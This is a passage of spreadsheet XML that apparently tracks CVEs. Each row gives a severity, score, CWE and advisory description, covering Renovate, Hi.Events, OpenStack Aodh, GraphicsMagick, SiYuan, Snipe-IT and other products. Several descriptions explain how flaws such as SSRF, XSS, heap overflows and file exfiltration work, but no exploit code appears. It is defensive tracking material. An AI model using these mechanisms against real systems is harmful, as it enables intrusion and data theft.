      <c r="K1622" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1622" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 32.135.0 before 40.33.0 contain a command injection vulnerability in the hermit manager where user-provided dependency names are appended to install and uninstall commands without proper sanitization. Attackers with repository write access can provide maliciously named hermit dependencies to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="M1622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76231</t>
        </is>
      </c>
    </row>
    <row r="1623">
      <c r="A1623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76232</t>
        </is>
      </c>
      <c r="C1623" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1623" s="5" t="inlineStr"/>
      <c r="F1623" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1623" s="5" t="inlineStr"/>
      <c r="H1623" s="5" t="inlineStr"/>
      <c r="I1623" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1623" s="5" t="inlineStr"/>
      <c r="K1623" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1623" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 31.51.0 before 40.33.0 contain a command injection vulnerability in the helmv3 manager where the repository parameter is appended to helm registry login commands without proper sanitization. Attackers with repository write access can craft malicious Chart.yaml files to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="M1623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76232</t>
        </is>
      </c>
    </row>
    <row r="1624">
      <c r="A1624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76233</t>
        </is>
      </c>
      <c r="C1624" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1624" s="5" t="inlineStr"/>
      <c r="F1624" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1624" s="5" t="inlineStr"/>
      <c r="H1624" s="5" t="inlineStr"/>
      <c r="I1624" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1624" s="5" t="inlineStr"/>
      <c r="K1624" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1624" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 39.53.0 before 40.33.0 contain a command injection vulnerability in the gleam manager where the depName parameter is appended to gleam deps update commands without proper sanitization. Attackers with repository write access can craft malicious gleam.toml files to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="M1624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76233</t>
        </is>
      </c>
    </row>
    <row r="1625">
      <c r="A1625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76838</t>
        </is>
      </c>
      <c r="C1625" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1625" s="5" t="inlineStr"/>
      <c r="F1625" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1625" s="5" t="inlineStr"/>
      <c r="H1625" s="5" t="inlineStr"/>
      <c r="I1625" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1625" s="5" t="inlineStr"/>
      <c r="K1625" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1625" s="5" t="inlineStr">
        <is>
          <t>Hi.Events validates a webhook destination only when it is registered, never when it is used. NoInternalUrlRule in backend/app/Validators/Rules/NoInternalUrlRule.php resolves the hostname with gethostbyname() and rejects private and reserved ranges, which any public hostname passes. At dispatch, WebhookDispatchService takes the stored URL and calls it through spatie/laravel-webhook-server without repeating the check, and backend/config/webhook-server.php sets no Guzzle options, so redirect following remains enabled by default. A destination that answers with a redirect to a loopback, private or cloud metadata address therefore causes the server to issue that request, and changing the hostname's DNS record after registration reaches the same result because no resolution is repeated. The response is not discarded: WebhookResponseHandlerService stores the body on the webhook log and WebhookLogResource returns it from the webhook logs endpoint, so the requester reads what the internal service replied rather than inferring it. Both event and organizer webhooks share the rule and the dispatch path. Version 1.11.1-beta revalidates at dispatch, pins the validated address, checks every redirect hop, and decodes IPv6 transition addresses that previously bypassed the filter.</t>
        </is>
      </c>
      <c r="M1625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76838</t>
        </is>
      </c>
    </row>
    <row r="1626">
      <c r="A1626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76878</t>
        </is>
      </c>
      <c r="C1626" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1626" s="5" t="inlineStr"/>
      <c r="F1626" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1626" s="5" t="inlineStr"/>
      <c r="H1626" s="5" t="inlineStr"/>
      <c r="I1626" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1626" s="5" t="inlineStr"/>
      <c r="K1626" s="5" t="inlineStr">
        <is>
          <t>CWE-688</t>
        </is>
      </c>
      <c r="L1626" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Aodh before 22.0.1, the alarm list API bypasses project scoping when the all_projects query parameter is set to false. The API checks for the presence of the all_projects key rather than its value; a true value enforces the administrator-only policy, but a false value removes the key and skips the branch that normally restricts results to the caller's project. A non-admin user with the reader role can list alarms from all projects, exposing alarm actions containing trust webhook URLs, Heat signal endpoints, project IDs, and user IDs. The parameter can also be combined with a foreign project_id to target a specific project's alarms. A related concern is that OpenStack Watcher does not apply authorization to its webhook trigger endpoint. Any authenticated user who learns an audit's webhook URL, for example from this leaked Aodh alarm metadata, can start an EVENT audit and its associated action plan regardless of their own project or role. The webhook endpoint has lacked policy enforcement since its introduction in the Ussuri release (Watcher 4.0.0).</t>
        </is>
      </c>
      <c r="M1626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76878</t>
        </is>
      </c>
    </row>
    <row r="1627">
      <c r="A1627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77118</t>
        </is>
      </c>
      <c r="C1627" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1627" s="5" t="inlineStr"/>
      <c r="F1627" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1627" s="5" t="inlineStr"/>
      <c r="H1627" s="5" t="inlineStr"/>
      <c r="I1627" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1627" s="5" t="inlineStr"/>
      <c r="K1627" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1627" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds write exists in the Photo CD (PCD) decoder of GraphicsMagick. In DecodeImage() (coders/pcd.c), the Huffman delta loop advances its output pointer with q++ after every decoded delta and never checks it against the end of the heap-allocated luma/chroma plane buffers. The pointer is repositioned only when a sync marker introduces a new plane/row; between sync markers the run length is bounded solely by the input.
A crafted PCD file that positions the pointer near the end of a plane and then supplies a long run of deltas with no intervening sync therefore walks the pointer past the end of the allocation and writes through it. Processing an untrusted PCD file — for example with gm convert or gm identify, or through any application linked against libGraphicsMagick — can corrupt heap memory beyond the buffers.</t>
        </is>
      </c>
      <c r="M1627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77118</t>
        </is>
      </c>
    </row>
    <row r="1628">
      <c r="A1628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77827</t>
        </is>
      </c>
      <c r="C1628" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1628" s="5" t="inlineStr"/>
      <c r="F1628" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1628" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1628" s="5" t="inlineStr"/>
      <c r="I1628" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1628" s="5" t="inlineStr"/>
      <c r="K1628" s="5" t="inlineStr">
        <is>
          <t>CWE-428</t>
        </is>
      </c>
      <c r="L1628" s="5" t="inlineStr">
        <is>
          <t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t>
        </is>
      </c>
      <c r="M1628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t>
        </is>
      </c>
    </row>
    <row r="1629">
      <c r="A1629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80118</t>
        </is>
      </c>
      <c r="C1629" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1629" s="5" t="inlineStr"/>
      <c r="F1629" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1629" s="5" t="inlineStr"/>
      <c r="H1629" s="5" t="inlineStr"/>
      <c r="I1629" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1629" s="5" t="inlineStr"/>
      <c r="K1629" s="5" t="inlineStr">
        <is>
          <t>CWE-476, CWE-497, CWE-73</t>
        </is>
      </c>
      <c r="L1629" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain an unauthenticated physical memory disclosure in DirectIo64.sys, reachable by unprivileged local users through a single IOCTL with no caller-identity check. The handler writes a crash-dump-format (PAGEDU64) image of all physical memory to a caller-supplied file path in the SYSTEM context, allowing a standard user to create files in locations they cannot otherwise write and to recover memory belonging to processes of other users. The image is preceded by a header that exposes the kernel loaded-module list, active-process list and PFN database pointers, defeating KASLR. The same handler also dereferences the return value of an internal kernel-structure locator without a NULL check; that locator returns NULL on three distinct failure paths, and a kernel crash results on builds where any of those paths is taken.</t>
        </is>
      </c>
      <c r="M1629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80118</t>
        </is>
      </c>
    </row>
    <row r="1630">
      <c r="A1630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82563</t>
        </is>
      </c>
      <c r="C1630" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1630" s="5" t="inlineStr"/>
      <c r="F1630" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1630" s="5" t="inlineStr"/>
      <c r="H1630" s="5" t="inlineStr"/>
      <c r="I1630" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1630" s="5" t="inlineStr"/>
      <c r="K1630" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1630" s="5" t="inlineStr">
        <is>
          <t>An attacker could impersonate the camera and place themselves in a man-in-the-middle or device-emulation position. This permits manipulation of device status responses, observation of application requests, and potential triggering of firmware-update behavior.</t>
        </is>
      </c>
      <c r="M1630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82563</t>
        </is>
      </c>
    </row>
    <row r="1631">
      <c r="A1631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85613</t>
        </is>
      </c>
      <c r="C1631" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1631" s="5" t="inlineStr"/>
      <c r="F1631" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1631" s="5" t="inlineStr"/>
      <c r="H1631" s="5" t="inlineStr"/>
      <c r="I1631" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1631" s="5" t="inlineStr"/>
      <c r="K1631" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1631" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 contains a cross-site scripting vulnerability in the unauthenticated favicon proxy endpoint GET /misc/favicon that allows remote attackers to execute scripts by supplying an SVG file URL. Attackers can host malicious SVG files with embedded scripts that execute in the victim's browser on the API origin, enabling same-origin credentialed requests to authenticated endpoints.</t>
        </is>
      </c>
      <c r="M1631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85613</t>
        </is>
      </c>
    </row>
    <row r="1632">
      <c r="A1632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85616</t>
        </is>
      </c>
      <c r="C1632" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1632" s="5" t="inlineStr"/>
      <c r="F1632" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1632" s="5" t="inlineStr"/>
      <c r="H1632" s="5" t="inlineStr"/>
      <c r="I1632" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1632" s="5" t="inlineStr"/>
      <c r="K1632" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1632" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.6.2 contain an authorization bypass vulnerability in checkout-acceptance report actions when Full Multiple Company Support is enabled. Authenticated users with reports.view permission can enumerate sequential acceptance IDs and soft-delete or trigger reminder emails for acceptances belonging to other companies by exploiting a null check on the legacy users.company_id column.</t>
        </is>
      </c>
      <c r="M1632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85616</t>
        </is>
      </c>
    </row>
    <row r="1633">
      <c r="A1633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85651</t>
        </is>
      </c>
      <c r="C1633" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1633" s="5" t="inlineStr"/>
      <c r="F1633" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1633" s="5" t="inlineStr"/>
      <c r="H1633" s="5" t="inlineStr"/>
      <c r="I1633" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1633" s="5" t="inlineStr"/>
      <c r="K1633" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1633" s="5" t="inlineStr">
        <is>
          <t>Trigger.dev versions before 4.5.2 fail to validate environment membership during run replay operations, allowing authenticated attackers to inject task runs into arbitrary environments. Attackers can replay their own runs into other organizations' or projects' environments to consume victim resources and pollute run history.</t>
        </is>
      </c>
      <c r="M1633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85651</t>
        </is>
      </c>
    </row>
    <row r="1634">
      <c r="A1634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86502</t>
        </is>
      </c>
      <c r="C1634" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1634" s="5" t="inlineStr"/>
      <c r="F1634" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1634" s="5" t="inlineStr"/>
      <c r="H1634" s="5" t="inlineStr"/>
      <c r="I1634" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1634" s="5" t="inlineStr"/>
      <c r="K1634" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1634" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 missing TLS and authentication on the IJent gRPC server allowed local code execution on Remote Development hosts</t>
        </is>
      </c>
      <c r="M1634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86502</t>
        </is>
      </c>
    </row>
    <row r="1635">
      <c r="A1635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86741</t>
        </is>
      </c>
      <c r="C1635" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1635" s="5" t="inlineStr"/>
      <c r="F1635" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1635" s="5" t="inlineStr"/>
      <c r="H1635" s="5" t="inlineStr"/>
      <c r="I1635" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1635" s="5" t="inlineStr"/>
      <c r="K1635" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1635" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to sanitize the category EULA text field before rendering it in checkout confirmation emails. Attackers with low-privilege permissions can inject markdown image syntax or raw HTML img tags pointing to local files or remote URLs, which the mail auto-embed library resolves server-side and returns as email attachments, exfiltrating sensitive files like .env credentials and enabling SSRF attacks.</t>
        </is>
      </c>
      <c r="M1635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86741</t>
        </is>
      </c>
    </row>
    <row r="1636">
      <c r="A1636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86751</t>
        </is>
      </c>
      <c r="C1636" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1636" s="5" t="inlineStr"/>
      <c r="F1636" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1636" s="5" t="inlineStr"/>
      <c r="H1636" s="5" t="inlineStr"/>
      <c r="I1636" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1636" s="5" t="inlineStr"/>
      <c r="K1636" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1636" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly sanitize markdown image syntax in note fields, allowing authenticated users to read arbitrary server files and issue server-side HTTP requests. Attackers can submit markdown image syntax in checkout acceptance notes that survive HTML escaping, are expanded by CommonMark parser, and resolved by laravel-mail-auto-embed via file_get_contents or curl, exfiltrating sensitive files like .env containing APP_KEY.</t>
        </is>
      </c>
      <c r="M1636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86751</t>
        </is>
      </c>
    </row>
    <row r="1637">
      <c r="A1637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86819</t>
        </is>
      </c>
      <c r="C1637" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1637" s="5" t="inlineStr"/>
      <c r="F1637" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1637" s="5" t="inlineStr"/>
      <c r="H1637" s="5" t="inlineStr"/>
      <c r="I1637" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1637" s="5" t="inlineStr"/>
      <c r="K1637" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1637" s="5" t="inlineStr">
        <is>
          <t>Waves Central for macOS contains a local privilege escalation in the privileged helper service. The helper authorizes connecting XPC clients by comparing the caller's code-signing certificate chain for equality with its own, rather than validating the caller against a pinned code requirement (application identifier and Team ID). A local, authenticated user can execute code within the vendor-signed process, satisfy the helper's client check, and cause the helper to execute a script with root privileges. Fixed in 17.0.</t>
        </is>
      </c>
      <c r="M1637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86819</t>
        </is>
      </c>
    </row>
    <row r="1638">
      <c r="A1638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87811</t>
        </is>
      </c>
      <c r="C1638" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1638" s="5" t="inlineStr"/>
      <c r="F1638" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1638" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1638" s="5" t="inlineStr"/>
      <c r="I1638" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1638" s="5" t="inlineStr"/>
      <c r="K1638" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1638" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 inserts persisted notebook template paths into HTML input value attributes without proper attribute encoding. Attackers can craft malicious template paths that break out of the attribute context and execute JavaScript when a victim opens notebook configuration, enabling same-origin API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="M1638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87811</t>
        </is>
      </c>
    </row>
    <row r="1639">
      <c r="A1639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87813</t>
        </is>
      </c>
      <c r="C1639" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1639" s="5" t="inlineStr"/>
      <c r="F1639" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1639" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1639" s="5" t="inlineStr"/>
      <c r="I1639" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1639" s="5" t="inlineStr"/>
      <c r="K1639" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1639" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in the Search Assets result list where asset filenames are interpolated into HTML without escaping. Authenticated attackers can craft asset filenames containing malicious markup that executes JavaScript in the victim's browser when searching assets, enabling same-origin API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="M1639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87813</t>
        </is>
      </c>
    </row>
    <row r="1640">
      <c r="A1640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87814</t>
        </is>
      </c>
      <c r="C1640" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1640" s="5" t="inlineStr"/>
      <c r="F1640" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1640" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1640" s="5" t="inlineStr"/>
      <c r="I1640" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1640" s="5" t="inlineStr"/>
      <c r="K1640" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1640" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in the search asset preview feature that fails to escape indexed asset content before inserting it into the DOM using innerHTML. Attackers who can place crafted text assets in a workspace can execute JavaScript in the SiYuan origin when victims preview the assets, enabling authenticated API requests and workspace manipulation.</t>
        </is>
      </c>
      <c r="M1640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87814</t>
        </is>
      </c>
    </row>
    <row r="1641">
      <c r="A1641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87815</t>
        </is>
      </c>
      <c r="C1641" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1641" s="5" t="inlineStr"/>
      <c r="F1641" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1641" s="5" t="inlineStr"/>
      <c r="H1641" s="5" t="inlineStr"/>
      <c r="I1641" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1641" s="5" t="inlineStr"/>
      <c r="K1641" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1641" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a path traversal vulnerability in the /api/riff/removeRiffDeck endpoint that fails to validate the deckID parameter. An authenticated administrator can supply path traversal sequences to delete arbitrary .deck and .cards files outside the workspace directory.</t>
        </is>
      </c>
      <c r="M1641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87815</t>
        </is>
      </c>
    </row>
    <row r="1642">
      <c r="A1642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88022</t>
        </is>
      </c>
      <c r="C1642" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1642" s="5" t="inlineStr"/>
      <c r="F1642" s="5" t="inlineStr"/>
      <c r="G1642" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1642" s="5" t="inlineStr"/>
      <c r="I1642" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1642" s="5" t="inlineStr"/>
      <c r="K1642" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1642" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the MongoDB integration for Laravel can cause an array supplied to an explicit equality filter to be interpreted as a query condition rather than as a literal value. This affects the three-argument `where` method when the operator is `=` or `eq`, as well as the `find` and `delete` methods that use that code path. An attacker who can cause an affected application to supply an operator-shaped array to one of these APIs may obtain a document other than the intended target or delete documents beyond the intended target.</t>
        </is>
      </c>
      <c r="M1642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88022</t>
        </is>
      </c>
    </row>
    <row r="1643">
      <c r="A1643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88890</t>
        </is>
      </c>
      <c r="C1643" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1643" s="5" t="inlineStr"/>
      <c r="F1643" s="5" t="inlineStr"/>
      <c r="G1643" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
